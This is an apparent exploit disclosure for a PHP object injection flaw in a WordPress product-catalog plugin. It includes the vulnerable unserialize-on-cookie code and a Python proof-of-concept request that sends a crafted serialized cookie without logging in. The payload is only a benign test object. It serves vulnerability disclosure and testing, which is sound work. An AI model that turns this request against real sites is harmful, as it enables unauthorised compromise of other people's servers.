# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection] # Google Dork: [NA] # Date: [Okt 30 2017] # Exploit Author: [tomplixsee] # Author blog : [cupuzone.wordpress.com] # Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/] # Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/] # Version: [<= 4.2.24] # Tested on: [Ubuntu Server 16.04] # CVE : [NA] tested on app version 4.2.23, 4.2.24 we can send an evil cookie (login not required) to vulnerable function 1. vulnerable code on Functions/Process_Ajax.php <= tested 203 // Adds an item to the plugin's cart 204 function UPCP_Add_To_Cart() { 205 global $woocommerce; 206 global $wpdb; 207 global $items_table_name; 208 209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout"); 210 211 if ($WooCommerce_Checkout == "Yes") { 212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID']))); 213 echo "WC ID: " . $WC_Prod_ID . "
"; 214 $woocommerce->cart->add_to_cart($WC_Prod_ID); 215 } 216 217 if (isset($_COOKIE['upcp_cart_products'])) { 218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products'])); 219 } 220 else { 221 $Products_Array = array(); 222 } 223 224 $Products_Array[] = $_POST['prod_ID']; 225 $Products_Array = array_unique($Products_Array); 226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/"); 227 } 228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart'); 229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' ); 2. vulnerable code on Functions/Shortcodes.php <= not tested POC 1. use a WP plugin to test php object injection, like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/ 2. make a request #----------------------------------- #! /usr/bin/python import requests url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?"; data = {'action':'upcp_add_to_cart'} headers = { 'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}' } r = requests.post(url, data=data, headers=headers) print r.content #------------------------------------